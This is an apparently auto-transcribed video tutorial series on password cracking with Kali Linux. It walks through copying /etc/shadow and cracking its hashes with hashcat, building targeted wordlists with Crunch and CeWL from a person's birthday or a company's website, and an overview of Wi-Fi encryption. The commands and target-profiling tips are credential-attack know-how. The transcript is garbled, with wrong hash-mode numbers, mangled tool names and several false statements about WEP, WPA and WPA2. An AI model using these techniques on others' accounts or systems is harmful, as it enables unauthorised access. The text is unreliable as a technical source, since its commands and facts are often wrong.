type, that is this one, that's the type MAV or whichever it is, and the attack method, that's -a. So in general, we will need to use both of these options in most password cracking attempts with hashcat. But there are more extensive options as well. If we scan a bit further down this hashcat help screen, we can see there are more options. The first two below are some of the key options that hashcat enables. First, hashcat enables rules that allow us to apply specifically designed rules to use on our word list file. These rules can take our word list file and apply capitalization rules, special characters, word combinations, appended and prepended numbers, and so on. Each of these will help us to break the passwords that have been made more complex to avoid dictionary attacks. The next stanza shows us custom character sets. This enables us to set the character set that we want to use to crack the passwords. If we know the company or the institution's password policy, we can choose a subset of characters to meet their policy and speed up our cracking. For instance, if a company allows an all-numeric character to set, let's say 1, 2, 3, 4, 5 or any random stuff like that, we can choose to crack the hashes with just numbers. These types of passwords are very easy to crack. The next screen includes some of the most obscure attacks of all times, including the output file, the debug mode, and the built-in character set. Finally, we have to choose the type of hash that we are trying to crack. Hashcat gives us numerous options, and when I get ready to crack the hash, I would need to designate in our command what type of hash we are working with by giving hashcat the number associated with the hash type. Here I can see a list of some of the hash types hash can work with. So let me just go through that. As you can see, we have these different hashes. I can use the built-in car sets that can go and select from these specific things or the capital or only these, or I can go and even use all of them, which will actually take lots of time. And these are the hash types: ND5, MD5 that's pass salt, MD5 that's salt pass, then Unicode, HMAC, MD5. So these are, to be more specific, this includes each and everything. So the next thing that we would have to do is to choose your word list. In this tutorial, I will be using a simple dictionary attack on some Linux hashes. To do so, I need a word list to work from. There are literally thousands of word lists available on the web, but Kali has numerous word lists built right in. So let's try using one of those. To find the built-in word list in Kali, we can type I'll just show you. Just type locate word list. Okay, so these are the different word lists that are available that we can go ahead and use to crack our passwords. So when we do, we can see that there are dozens of word lists available. And I'll be using this word list built in for SQL map, which has over 1 million words and hybrid words as well. So we would be using that one through SQL map. And the next thing we would be doing is we would be grabbing the hashes. So in the next step, I need to grab the hashes on our Kali system. If we are logged in as root, we can see and grab the hashes as well. So in Linux, the hashes are stored in the etc shadow file. So it would be over here, and if you go ahead and type shadow, you can see this shadow file over here. And this is the full hash, but we would only be needing this particular file. So I'll just go down and do the word wrap. Okay, it's already done, I believe. So this would be the hash file that we are trying to crack. So now we can see the shadow file with the hashes as above. So this is the hashtag that I would be going ahead and actually cracking this, but that would be in the next part of this tutorial. So if you have the basics, what I have been teaching you till now as to how you can go and do that, it will be very easy for you to crack. But if not, then you need to go through this tutorial again, or you can go ahead and we would be using this specific word list to go ahead and crack our database, and if you are using something else, these are different ones that you can go ahead and use. If you don't want these, you can go ahead and create your own and then go ahead and transfer that over here, or you can go ahead and download something from the web, but it would already have been included already in Kali, because Kali is already famous for multiple word lists. So that is it for this tutorial. In the next tutorial, I'll be teaching you how we could actually go ahead and crack some passwords of our own Kali Linux. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So yeah, before I proceed, I'll just go ahead and close this Windows stuff. Okay, so I'll just come back over here. So in the previous tutorial, I taught you where our shadow file is. So I'll just go ahead and show that to you once more. Over here in the file system, you can go in the etc and just type shadow, and this is where our passwords are stored. And this is the one which is converted into the MD5 hash file. And everything is converted, in fact, but we will only be interested in this one. Perfect. I'll just go ahead and close this. So in this tutorial, I'll be grabbing the hashes of our own Kali Linux, which is quite secure, but still, no matter how much secure it is, it will still be it can still be cracked. There's a famous quote for that that's called as security to obscurity, and that's very famous. So you can just go ahead and search that, and you'll come to know exactly what I mean over here right now. So you can see the shadow file over here with the hashes below. Next thing we need to know is what type of hash system is using. In Linux, I can go ahead to the etc and login details. So I'll just open this. So just to be sure, over here, before I proceed, I'm assuming that we already have access to the computer or whichever we are trying to hack, and we are just trying to gain the password for that so that we could go ahead and gain access to it anytime. So that's what I'm assuming. In the previous tutorial, you can check as to how we can actually go ahead and crack something. So in this tutorial, I'll only be teaching you how we could go ahead and crack something, and I will assume that we already have access to the system. So since we have access to the system, I can go into the etc and I can go ahead and check the login period DEFS file. And over here, you can see which exactly is the method of this specific hash file. So if you go and scroll over here down almost half of it, you will see exactly which. Let me just scroll it down. Okay, so as you can see, we have the method over here. Encryption method is SHA-512. So now we know which, now we have the hash file and we have the SHA-512 method. We know that which encryption method is it using. So this is very important, as we will need to tell the hashcat this information when we are ready to crack the hashes. Else, we'll have to just go ahead and use each and every other method and it will not work. So I'll just go ahead and fire up my terminal. Perfect. Okay. So now we come to the part where we would be going ahead and cracking the hashes. So now we know the basics of hashcat as to what exactly hash is and how exactly it works. That is the login details. We know in which it is actually converted, which is the encryption method used, and we already have the hashes. Let's put these hashes into separate file. I'll just go ahead and name this as hash list. So I'll just go ahead and type cp space /etc/ shadow, and I'll just go ahead and name it to as hash period lst. And to make sure that they are copied over this directory, I'll just type more hash lst. And okay, so as you can see, we have all of the details over here that we had. I'll just go ahead and close this. But now, as you can see, it's only displaying half of the part. If I go ahead and click enter over here, it will show me everything, 52, 54, 56. That means it's showing the rest of the things that is included in that. So I'll just go ahead and close. Perfect. So to prepare this file for cracking, we need to remove all of the information in this file except for the hashes. So the etc shadow file includes the username, salted hash, and everything. As you can see, it uses the bin, sys, and UUCP backup. So we need to remove all of these things because we don't need that. It also includes the username hash, and we don't even need that actually. So in order for us to do that, we need to remove all the information, leaving just the hash. We can see that the file starts with the username, that's root colon and this file. So open this file in your favorite text editor. It can be leafpad, vim, or vi. I'll be using gedit, and I'll be using hash period lst, and I'll hit enter. and when it opens over here, I will be going ahead and deleting everything. So now just go to the end of the line and remove the information after the hash that starts with the colon. So I'll just go ahead and delete all of these things and this username as well. Perfect. So yeah, now we have a file with just the hashes and nothing else. So yeah, perfect. So in the final step, we can now start cracking the hashes. So I'll just go ahead and let me just edit it over here. And yes, we also need to go ahead and remove all of these things. Perfect. Okay, let me check. I believe this is something different. Okay, never mind. I'll just save this and I'll try to crack. If I'm unable to, then I'll just go ahead and delete this and this as well. Never mind. Let's go down and I'll just save it and perfect. I'll close it. Perfect. So now hashcat, through hashcat, we will go ahead and use a command through which I can go ahead and crack that. So I'll just type hashcat. And if you are unable to go ahead and crack something, don't be frustrated or disappointed because that happens a lot of times. It just takes practice and experience to go ahead and use the perfect characters to go ahead and crack that. So this is the specific cracked period txt and remove SST. I'll just go ahead and move it over here so that it will be clear for you to see. ST and I'll type slash user share SQL map. Okay, perfect. txt slash word list period txt. Perfect. Over here, before I proceed, minus m minus one m 800. It designates the type of hash that we are cracking. That is SHA512. Over here, hyphen A0 designates a dictionary attack. Hyphen O, it means the crack TST means it is the output file for the cracked passwords where we would be going ahead and saving everything. Remove tells hashcat to remove the hash after it has been cracked from the hash period LST in our input file of hashes to user share SQL map txt word list where it is the absolute path to our word list for our dictionary attack. So once the cracking process starts, we can hit enter to get an update on the process. When hashcat is completed, it will work and it will show you the screen like where hashcat announces that it has recovered all the hashes from everything over here of the work. So we only need to open the cracked TST file to view our cracked passwords. Hashcat may be the world's best password cracking tool right now. So take some time and get to know it. It has many more features than I have just used right now, which has more advanced version. I'll just go ahead and select enter and yes. Just go ahead and hit yes over here. Okay. Let's just file a directory. Okay, I should have typed hash period lst. Okay. Now press enter for the status screen and it will start going ahead and try to decode that thing. Hashcat can crack many passwords many times faster than your CPU can. So if you have your GPU installed, that's graphic processing unit installed and up and running, then it will take much easier time for you to go ahead and install. So as you can see, the progress is 0.78%. You can just go ahead and type on hitting enter. So I have in fact a decent password over here. I won't even say decent. So it should be probably be cracked within few seconds or minutes, not seconds exactly. Let's see what it is exactly. 0.9%. It's 1.5% is over. 415 were planes and 415 were words which have been checked till now. Let's wait till this gets completed. So 2% right now. I assume this will take a bit of time. So it contains a total of, I believe, 12 lakh passwords, I believe, if I'm not wrong. It contains 12 lakh words inside that word list, and the progress is this much, so it's still continuing. So by the time it is over, let's go ahead and check our txt file and what all passwords are there inside that. So it's in user share SQL map txt and word list. So I'll just go ahead and open this. Let me see. So it's still continuing. These many words have been tried, and these are the total words. So my probably would password would be here. Let me check. I won't say which password it is exactly. Let me check if my password is already there. Okay, and let this continue. So, and just to clear you out, this is not the word list. This is that I've been trying to crack. This is the places where I will get the exact password. So let me check. A B. My password is abcd@123. So let me check if it is cracked. Okay, it will take much more time. Okay, as you can see, I have it over here. Perfect. It's 6%. BCD. So let's check. Estimated time is 50 minutes. That's way too long, and I cannot actually wait to see that. So I'll just go ahead and check if I have my password. If it is there, that means I will be able to crack this password. Let's see. Search string not found. If it has ABCD. So we have BCDA, that means at the 1, 2, 3. So I should be able to crack this. So not a big deal for that. So and just make sure that it may not necessarily crack the whole password. Let's say, for example, my password is ABCD at that 1, 2, 3. It may only crack ABCD and it will show something like letter or some 3, 4 words in between and then 1, 2, 3. The reason being that it was not able to detect what it was, or it was not able to, let's say, decode that was. It won't be very much hard to go ahead and ask for decode that if it's just like 3 to 4 letter word, because yeah, it won't be easy because we have already cracked most of the time. So you can just go ahead and try your luck replacing that text with something like 1 or 2 or ABC, any random stuff, and you will be able to crack that. So that is it for this tutorial. I won't be able to wait till the password has been cracked because it will take approximately an hour for us to crack. As you can see, the time is counting down, and it was like it was probably 1 hour when it started. Yep. So that's it for this tutorial. In the next tutorial, I'll be continuing with the password cracking method, but I will be going out something with the theory and not exactly the practical stuff. So that's it for this tutorial. Have fun, guys. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorials, I have taught you as to how we could go ahead and crack different types of passwords, SHA-12, MD5, and different other things. So in the series on password cracking, I have been attempting to develop your skills in the age-old art of password cracking. Although it might seem like a simple and a straightforward exercise, those of you who have attempted password cracking know that there are no simple ways to this art. So in many of our cracking disciples, we have often need to use a word list that will essentially attempt thousands of potential passwords per second. So this is often referred to as a dictionary attack. And even though we need not rely solely on dictionary words, these word lists may have any combination of characters and words in an attempt to crack a complex password offline. Sometimes we may have indications of the target's choice of password or password components which may come from our knowledge of our target. Example, normally from our girlfriend or neighbor or friend, etc. So normal people normally use it's kind of an irony that I'm talking about over here, but normal people actually go ahead and use their own name in addition to some characters or some other letters, not exactly letters. So it's quite easy to go ahead and guess that. We may also know the organization if we're trying to attack an organization, their password policy, minimum 8 characters or uppercase and lowercase, etc. So in these cases, we may be able to generate a custom word list that reflects our knowledge of the target or the organization's password policy. Kali Linux has built it into a tool called as Crunch that enables us to create a custom password cracking word list that we can use with tools such as Hashcat, Cain and Abel, John the Ripper, Aircrack NG, and many others. This specific custom word list might be able to save us hours or even days in password cracking if we can craft it properly. So let's get started with Crunch and generate some custom word list to crack passwords in our favorite password cracking tool. So let's go ahead and fire up our own Kali Linux and open the terminal. And before I proceed with the okay, I'll just go ahead and show you the GUI method. So you can select Kali Linux. Over here you can go to the password attacks. Over here the offline attacks, because we are cracking something online, and you can go ahead and you start Crunch over here. So it does not say much about itself. Crunch can create word lists based on the criteria you specify. The output can be sent to the screen file or another program. So usage would be Crunch, minimum and maximum characters and options, and minimum and max are the numbers. So please refer to the man page for instructions. So we don't actually need to go ahead and use anything. So unlike many other hacking applications, Crunch does not provide us with much info on its opening screen. Let's say, for example, if I go ahead and open the SE toolkit, it will give me a lot of information about itself, such as social engineering attack. If I go ahead and type 6, I'll get the help exactly. Okay, the source file directory, readme. Okay, the MD file, I need to go ahead and rename that, so I'll just ignore that. Or if I could just go ahead and type #cat, and I can just go ahead and type help, it will show me all the things that #cat can do. Or if I type, let's say for example, evil grade, it will give me each and everything that evil grade can do. But over here, as you can see, it does not provide much information about itself. So I believe that because Crunch, although relatively is simple to work initially, it has so many sophisticated options that the developer has to put much information in the man pages. So that's why he has not gone ahead and discussed much about it over here. So basic syntax for Crunch looks like you can just go ahead and open the Kali Linux and Crunch, type out the minimum and maximum characters, the pattern that would be -t, and the output that would be the file name. Now let's go over what's included in this syntax over here. The minimum is the minimum password length, maximum is the maximum password length, character set is the character set to be used in generating the passwords, -t is the pattern, that is the specified pattern of the generated password. So let's say, for example, if you knew that your target's birthday was 0728, that's July 28, and you suspected that they used their birthday in their password. That's people often use. So you could generate a password list that ended with 0728 by giving Crunch the pattern such as, let's say for example, @ something like that, and 0728, something like that. So this word, this will generate up to 11 characters, or I don't know how much exactly. Let's make count 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13. So I'll just go ahead and delete 2. Perfect. So this will generate up to 11 characters of password. So 7 will be variable. That means these 7 digits can be anything, whereas these are fixed because we think that the person may use these 4 digits as fixed, and it will total have 11 characters in total. And -o over here will be the output file. So this is the file that you would want the word list to be written to. So the Crunch manual. Let's go ahead and check the Crunch manual for that. So I'll just type man and I'll type UNCH. And this is how it looks like, the Crunch manual. I can just go ahead and view all of these things, but it's extremely long, so I won't be actually going ahead and looking into these things. But if you want to gather a good understanding of what exactly we are doing, then you should actually go ahead and see these things. And I'll just go ahead and type Q to go ahead and quit. So since now you have opened manual pages for Crunch, it will look like that. The developers of Crunch have packed these pages with a lot of info on how to get the most of Crunch. So if you go ahead and I'll just open the Crunch once more. So if you go ahead and page down a bit, you will come to this page, and you can see that if it says that we are at line 21 over here, I'll just go to the line 70. Okay, perfect. So if you see it over here, it will show that -f will go ahead and specify the path, and -I will go ahead and invert the output. So example, if I used AAA, then invert of A is AAA again. If I used AAB, it will go ahead and convert it into BAA and etc. and something like that. So here we will tell Crunch where the character set period LST is with the full path, and then select a particular character set from that list. You don't understand? So I'll simplify it for you. In Kali, the character set period LST is at user share rainbow character set list. So I'll just go down, browse it over, user share rainbow crack and char character period. Okay, this is our file. Just go ahead and display it. This is how it looks like. It's self-explanatory, so I don't need to explain that. So we would be creating some simple word list. So let's start by generating some simple word list for password crack. Let's assume that we know the company has passwords between 4 and 8 characters. We can generate all the possibilities in Crunch by just typing Crunch and the numerics that we want. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So I'll just continue where I left off in the previous tutorial. So in the previous tutorial, I taught you about the manual page of Crunch. So over here, we will be generating some simple word list for password cracking. And I'm assuming over here that we already know the company has passwords between 4 to 8 characters. So we will be generating all the possibilities in the Crunch by going ahead and typing. I'll just go ahead over here and I'll just type Crunch. Now I'll type 4 space 8. So now Crunch will now generate these amount of bytes. So now it will go ahead and generate all the passwords from 4 to 8 bits. So it will be very long. So when I execute this statement, Crunch estimates how long the file will be. So I'll just go ahead and cancel this. And the reason being that it will take a total of approximately 1 to 4 GB because it has a number of passwords. So I won't go ahead and run this as of now. So what if we knew the target always used password from 6 to 8 characters? Because 4 to 8, people don't use 4 to 8 characters. Let's be realistic. People use characters that should be like around minimum of 6 characters in at the least, and it can be up to like 10 characters. But for this tutorial purpose, I'll be using 6 because I don't want to hang my PC. The reason being that it's only working on 1 GB RAM and I don't want to crash it. So I'll just go ahead and use 6 to 8 and I'll just go ahead and let's specify it a bit more. Let's assume that we could generate, what if we knew that we could generate a complete list of password possibilities meeting this criteria and send them to a file in the root users directory called as numeric word list .lst. So I will be creating a password between 6 to 8 digits and I will be going ahead and transferring it into the root directory. So I'll just type 6 to 8 and I'll type 1, 2, 3, 4, 5, 6, 7, 8, 9 and 0 -o and I'll type /root /numeric _ word list .lst and I'll hit enter. It will now generate the passwords, and as you saw over here how many it was. So if we knew the target's birthday was July 28, as I told you in the previous tutorial, and they likely used, it's likely that they will use that date because people often use their birth dates in their password to make it easier to remember. So at the end of the 10 character password, we could generate all the possibilities of the 10 character password that end with 0728. That's July 28. So I'll send the output to a file in the root users directory named as birthday word list by typing something. Let me just complete this thing and I'll go ahead and start with that. Or I will just go ahead and cancel this because it's still at 25 lakhs, I believe, and it will go up to 9999999. So I'll just go ahead and stop that because that's not making any sense. So now I'll go ahead and generate 10 total of 10 new word list. That's 10 character word list, and which will end with a 0728. So I'll just type CRUNCH, and by that time I'll just go ahead and delete my word list, both of them. Perfect. I'll just type crunch space 10 space 10. And I'll type space -t and I'll type 1 2 3 4 5 6 0 7 2 8 and it's still 6 7. Perfect. And I'll type -o and I'll type root slash, and let's say since it's birthday list period lst. Perfect. Okay, maximum length should be the same size the pattern is specified in 10. So okay, so I used a total of, sorry, perfect. So now I'll just go ahead and hit enter. So this at the rate is used to represent a wildcard of all possibilities. So while the literal means that these are the fixed values, so it will go ahead and generate a word list which has 0728 in fixed at the end, but these will vary, these 6 digits. It can be numbers, characters, digits, anything. So complex word list with crunch is that one of the beauties of crunch is the ability to select a specific character set or create your own character set for generating our password list. If we know the likely character set the target is using for their password, we can select the character set to generate our password list. So now if we know that our target is using an 8 character password with only alphabetic characters, we can generate a list of all the possibilities in crunch with a command that I would be showing you. So just let's first let this complete and I'll show you after that. 41% is completed. I believe we should already have a Word file over here which should have started. Start. Okay. Root. Perfect. Let it complete. It's about to end. These are the total passwords that we would be getting right now. Almost done. Perfect. Just go ahead and open that right now. My birthday list is created, so I'll just go ahead and open that. Okay, let me check. Allocate. Okay, so it won't be able to open. The reason being that it has lots of files, so I cannot open it with a leafpad because leafpad does not support that. So I'll just open it with G text editor, and I'll just go ahead and cancel this. The reason being that I'm canceling is that because, trust me, you would not want to go ahead and open this file. It will contain all the files, but just think, it's trying to go ahead and open. I'll just go ahead and show you. It's trying to, so what we are trying to do over here is we are trying to open these many numbers of words created, and leafpad cannot go ahead and open that. And as you can see that this is going on increasing. These are all the possible words that can be the password for that. As you can see, the last 4 digits are fixed, only the first 6 digits have changed. So I will not wait till this has completed. I'll show you another example by that point of time. Perfect. So what if we knew that our target is using an 8-character password with only alphabetic characters? So now I'll go ahead and generate a word list with only 8 characters. I'll just type crunch space 8 space 8. I'll type -f/user/share and rainbow crack, and I'll just type character set txt, and I'll type mix alpha -o / root /alpha word list period lst lst. Perfect. I'll just go ahead and hit enter. Okay, mix alpha not found. Okay, let me perfect. I misspelled it. So these are the total password it's generating. So just think what you did over here. You generated so many passwords, and so there is not any single possibility that you won't be able to go ahead and crack this thing, because now if we know that our target is using 8-character password with only alphabetic characters, we could do this. Or I have one more option for you, because instead of doing that, I'm just showing you how to do that. You can take your own time at your own place and go ahead and complete or create that password. So now if we know that our character is only using an 8-character password with only alphabetic characters, I can go ahead and do that by using this mix alpha O. But there is one more method. I'll just type the same thing, but it would be a bit different. I'll just type the same, that's crunch 88-f and user share rainbow character set mix alpha O root word list. So this will go ahead and create that specific thing. This will generate all the 8-character passwords using only alphabetic characters, no numbers or no special characters, and storing them in a file called as alpha wordlist period lst in the root users directory. So while cracking passwords, there are multiple methods of cracking unknown passwords. These include dictionary, rainbow table, brute force, and others if we know that parameters of the password, or we know something about the target and their possible passwords such as birthday, pet name, spouse, etc. Crunch can be extremely useful tool for generating specific word lists to be used in a dictionary-like attack. So yeah, that is it for this tutorial. Stay tuned on these tutorials on password cracking for more guides, and there would be one final tutorial before I go ahead and complete the password cracking chapter in whole. So that's it for these tutorials. Have fun, guys. Hey guys, welcome to the final tutorial of ethical hacking and penetration testing via Kali Linux, and this is the final tutorial for password cracking. So in all of my tutorials till now, I have taught you how we could go ahead and crack different types of passwords or generate word list through various ways. So in this series of password cracking, my previous tutorials, I began by showing off some basic password cracking principles. I developed an efficient password cracking strategy, demonstrated how to use Hashcat, which is one of the most powerful password cracking programs. And then I showed how to create a custom word list using Crunch. In this tutorial, I will show you how to create a custom word list based upon the industry or business of targets using Q, or cool as I say, or the specific word would be CEWL, C in caps, WL in caps. That's what it is spelled actually. So most password cracking programs are only as good as the word list that you provide them. Brute force password cracking is very tedious and time consuming, but if you can find an appropriate and well-designed word list that is specific to the user whose password you're trying to crack, you can save yourself hours, maybe days, or even months and years of password cracking. And trust me, when you're trying to crack some extremely difficult password, it can also take you months. But normally people don't go to that extent unless you actually have a supercomputer and you are trying to crack some password, or you're trying to launch some kind of nuclear attack to other country. So just joking. So Crunch is great at creating word list based upon a set of rules such as a number of characters, the character set, etc. But it doesn't enable us to choose a word list that is particular to a business or industry or interest. We are humans and we are not always very creative, and we often fall victim to the familiar, especially when generating passwords. If we understand that, it can be helpful to finding potential passwords and generating a relevant password list. For instance, let's say employees at a construction company are most likely to use words for the passwords that are used in their industry, such as lumber, girder, build, soffit, eve, etc. People in drug industry are more likely to have passwords such as prescription, drug @123, hash, pound, narcotics, barbiturate, etc. So you have the idea as to what I'm talking about over here now. So it's simply actually human nature or social engineering that words we use in our everyday experience will first pop into our heads when we are considering passwords. That's why many people use their pet's name, spouse's name, children's name, birth dates, anniversaries, street addresses, etc. And these are not very creative, and used words and numbers that first come into our mind are the one that we use normally. So leave these things apart. If you are a system administrator or working under security, many people even keep the password as admin @123, admin plus 123, admin pound 123, or root @123, root pound 123, or something like that, which is actually very stupid. So let's get started as to how we could actually go ahead and use Q. So we can use this lack of creativity to develop a specific word list for a specific company or industry. That's what cool or cool can do for us. I don't know how it is spelled, how it is pronounced. It's written as CEWL. So if you could see this, you'll know what exactly I'm talking about. It's cool or cool or whatever it is. I'll call it cool. So cool is designed to grab words from the company's website, create a specific word list to the company in order to crack passwords of the users at the business. So let's get started with cool. So I'll just go ahead and close this. So just fire up your Kali. I'll just and just type CEWL and type hyphen help. It will show you all the metadata and what it could go ahead and use to go ahead and crack the passwords. So note that the depth, that is the -D over here. -D is the minimum word length, -M is the switches. -D switch determines how deep, that is the default is 2, into the website the cool will crawl, grabbing words, and -M switch determines the minimum minimum length of words it will grab. Since most firms have a minimum password length, there's no need to grab short words. In this case, I will be setting the minimum to 7 letters. So let's see how we could go ahead and build a custom list with cool. To build a custom word list, we set the cool to scraping words from the websites. So let's say I'll go ahead and use the Microsoft website. So it would be www.microsoft.com. So I'll go ahead and type Kali. Oh, sorry, not Kali. It's CEWLQ space -W space custom underscore word list period txt space -D space 5 space M, because it will be between 5 to 7, and space 7 microsoft.com. Okay, perfect. And I'll hit enter. So let's break this down. The -W is the custom word list period txt file. The -W means it will go ahead and write to the file named as custom word list. -D would be the depth that Q will crawl to the website. That means inside the website. The 7 means the minimum word length. In this case, it will grab a word of 7 characters in minimum. And www.microsoft.com is the website. This command will then crawl the Microsoft website to a depth of 5 pages, grabbing words at least 7 characters long. After several hours of cracking or few minutes, as you can see over here, to the website, Qul can place all the words it found inside the file that is custom word txt. We can then open it with any text editor. In our case, we will be using the notepad over here. So you can just go ahead and type over here as leafpad space, you can type custom word list, and okay, nothing has opened. I believe I believe I don't have connectivity to the internet. Let's check. Okay, I have connectivity. So let's go ahead and use some other website. Let's go ahead and check www. Let's say, for example, let me remember. I'll use a random sans.org. Let's see what we get, or if we get something. Microsoft may be too secure that it does not allow crawlers to crawl inside that. Let's see what we get when we try sans.org. I just hope that this will not duplicate anything. Just combine this word. So what we need to do finally, once it's done, is that we will combine this word list with another word list or one generated by Crunch. So place these words first, as they are specific or to this user or company and are more likely to be correct. Of course, we can use Qul to create custom word lists for password cracking targets other than the employees at a particular company. For example, if we know the individual who is our target is a football or a soccer fan, we use a Qul to crawl a soccer site to grab soccer related words. That is, we can use Ql to create specific password list based upon just about any subject area by simply crawling a website to grab potential keywords. So let me check if it's completed. If it's not, then I would have to likely end this tutorial. Okay, it's still searching. So once it has searched everything, it will go ahead and write that down to our custom word list. But that is it for this tutorial. And yes, that concludes the whole chapter of password cracking. So that's it for this tutorial. In the next tutorial, we'll be looking at something different. And yeah.
Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So even if you knew how to go ahead and secure your Wi-Fi network and you have already done so, you probably will find all the encryption acronyms a little bit puzzling. So today you will I will go ahead and highlight the differences between encryption standards like WEP, WPA and WPA2 and why it matters, which acronym you slap on your home Wi-Fi network is more important, and later on I'll be teaching you how we could go ahead and try to bypass these securities. So to start with, first, there are different types of securities. Recent technologies have 802.11b, 11g. Most commonly used are 11v, that's up to 11 Mbps. And 11b and 11g are not that famous, but they're used in very large companies because they have extreme high speed. 802.11b uses security techniques like WEP to make the network secure, but WEP is not that secure. As per my experience, and not only my experience, even if you go ahead and check on the internet, it's very easy to go ahead and crack the WEP encryption. That's why. And finally, we have the IEEE that came up to 802.11x standards for wireless Ethernet. So let's go ahead and take a look at the different types of authentication that we have. And the first one is WEP, and after that we have WPA, WPA2, and 802.1x authentication. But I won't be teaching you much about 802.1x because normally people only go ahead and use WPA2 no matter what kind of organization they are in. So you might be wondering, why does it all matter? You did what you were told to, you logged onto your router after you purchased it and plugged it in for the first time and set a password. What does it matter what the little acronym next to the security encryption standard you choose was? As it turns out, it matters a whole lot, as is the case with all encryption standards. Increasing computer power and exposed vulnerabilities have rendered older standards at risk. It's your network, it's your data, and if someone hijacks your network for the illegal let's say hijinks, it will be the police knocking on your door. And if you have some kind of organization, then they can use that to gain access to confidential information and then later corporate espionage. So understanding the differences between encryption protocols and implementing the most advanced one for your router can go ahead and help you increase your security, or upgrading it if it cannot support current generation's secure standards. So that is the difference between offering someone easy access to your home and network and sitting secure. So let's start with these four types of authentication. Since the late 1990s, Wi-Fi security algorithms have undergone multiple upgrades with outright depreciation of older algorithms and significant revision to upgrade newer algorithms. So if you go to look at your history of Wi-Fi security, it will serve to highlight both what's out there right now and why you should avoid the older standards such as WEP. So I'll just go to the next. Okay, so this is what a WEP looks like, and WEP, that is the full form is wide equivalent privacy. WEP is most widely used Wi-Fi security algorithm in the world. That is a function of age, backwards compatibility, and the fact that it appears first in encryption types selection menus in many router control panels. WEP was ratified as a Wi-Fi security standard in the September 1999, and the first versions of WEP were not particularly strong. Even for that time, they were released because United States restrictions on the export of various cryptographic technology led to manufacturers restricting the devices to only 64-bit encryption, whereas this was this was only a 64-bit encryption. When restrictions were lifted, it was increased to 128-bit despite of the introduction of 256-bit WEP encryption. So 128-bit remains one of the most common implementation standards. Despite revisions to the algorithms and increased key size in the WEP, over time numerous security flaws were discovered in the WEP standard,
As computing power increased, it became very easier and easier to exploit them. As early there was some exploits that were floating around. By 2005, that the FBI from the United States gave public demonstration in an effort to increase the awareness of WEP's encryption. So WEP are not commonly used that much these days, and despite various improvements, workarounds and other attempts to shore up the WEP system, it remains highly vulnerable, and systems that rely on WEP should be upgraded, or if security upgrades are not an option, replaced. The Wi-Fi Alliance officially retired WEP in 2004. So I'll just go ahead and explain you the process as to how WEP encryption works like. WEP encryption is specified by IEEE 802.11 for encryption and authentication. So this means that the standard describes WEP as having two main parts. The first being the authentication part and the second being the encryption part. The goals of WEP are access control achieved by preventing unauthorized user from gaining access because they do not have the correct WEP key. Privacy is obtained by using the WEP key to encrypt the wireless LAN data streams, and only those with the correct WEP can decrypt them. So this figure will show you an idea as to how exactly WEP encryption works like. The encryption process used by the WEP is Rivest Cipher 4, that's called as RC4. This is also an integrity algorithm CRC32, which is used on the plain text to create the integrity check value, that's ICV, which is used to protect them from tampering or unauthorized data modification. And this figure will show you exactly what decryption of algorithm looks like. So yeah, that's how it works. So now coming back to our next part would be the WPA encryption, which is the full form is Wi-Fi Protected Access, and you all must have already guessed WPA2, that's Wi-Fi Protected Access 2. WPA access was the Wi-Fi Alliance's direct response and replacement to the increased vulnerabilities of WEP standard. It was formally adopted in 2003, I can say, a year before WEP was officially retired. The most common wireless protected access configuration is the WPA PS key, that is the pre-shared key. The keys used by WPA are 256-bit, a significant increase over the 64 and 128-bit keys used in the WEP system. And some of the significant changes implemented with WPA included message integrity to determine if the attacker had captured or altered packets passed between the access point and the client, and the temporal key integrity protocol, that's TKIP. TKIP employs a per packet key system that was radically more secure and fixed, I can say, than that was used in WEP system. TKIP was later superseded by AES, that's Advanced Encryption Protocol, which is used nowadays. So despite what a significant improvement, okay, just let me go back. Okay, so despite what they say about the improvement done over WPA over WEP, the ghost of WEP still haunted WPA. That's TKIP, which is a core component of WPA, was designed to be easily rolled out via firmware upgrades onto system existing with WEP enabled devices. So as such, it had to recycle certain elements used in the WEP system, which ultimately were exploited. It again became some kind of backdoor for hackers to go ahead and gain access into that. So WPA, like its predecessor WEP, it has been shown via both proof of concept and public demonstration to be very vulnerable to intrusion. Interestingly, the process by which WPA is usually breached is not a direct attack on WPA algorithm, but by attacks on a simply patented system that was rolled out with WPA and Wi-Fi Protected Access, that's WPS, which was designed to make it easy to link devices to modern access points. And to be more precise, if I tell you how it works, WPA, that's Wi-Fi Protected Access, it is a subset of 802.11i security protocol, and it was used to improve encryption and authentication capabilities to the IEEE wired equivalent privacy, that's WEP protocol. The 802.11 work group has been developing a security standard, that's 802.11i. The decision was made to take the stable parts of the upcoming 802.11i standard and implement them into a standard that would provide wireless security until the 802.11i standard was finalized. So the standard takes these 6 elements of the 802.11i protocol and puts them together to increase the security provided by WEP. And finally, we have the WPA2, which is quite different and the most secured till date, but I won't say that it's that secure, because still, even though if it, no matter how secure it is still crackable, but not as much as the WPE or WPA or WEP. So WPA, that is wireless protected access 2. So it was started in 2006 and it was officially superseded by WPA2. One of the most significant changes between WPA and WPA2 was the mandatory use of AES algorithms and the introduction of CCMP, that is counter cipher mode with a block chaining message authentication code protocol. I believe that's what the full form is. So it was a replacement for TKIP, which was still preserved in WPA as a fallback system and for interoperability with WPA. So currently the primary security vulnerability to the actual WPA2 system is the obscure one, and it requires the attacker to already have access to the secured Wi-Fi network in order to gain access to certain keys and then perpetuate an attack against other devices in the network. So as such, security implementations on the known WPA vulnerabilities are limited almost entirely to enterprise level networks and deserve no practical consideration regard to home network security. But unfortunately, the same vulnerability that is the biggest hole into the WPA armor, the attack vector through Wi-Fi protected setup, that's WPS, remains in the modern WPA2 capable access points. Although breaking into the WPA or WPA2 secured network using this vulnerability requires a total of 2 to 14 hours of sustained effort with a modern computer, it is still a legitimate security concern and WPS should be disabled, and if possible, the firmware of the access point should be flashed to a distribution that doesn't even support WPS, or so the attack vector is entirely removed. So Wi-Fi security history, now you know what it's like. So now what? At this point, you will be either feeling a little smug because you're confidently using the best encryption scheme available for your Wi-Fi access point, or you're a little nervous because you packed in the WEP since it was at the top of your list. If you're on the later, you don't have to worry, but if you have used WEP, you never know, someone might already have gained your access. So before I hit you with a further reading of our top list of Wi-Fi security tutorial, this is a basic list ranking with current Wi-Fi security. The first one and the best one would to go ahead and keep your network secure would be to use WPA2 plus AES encryption. After that, WPA plus AES. After that, WPA plus TKIP or 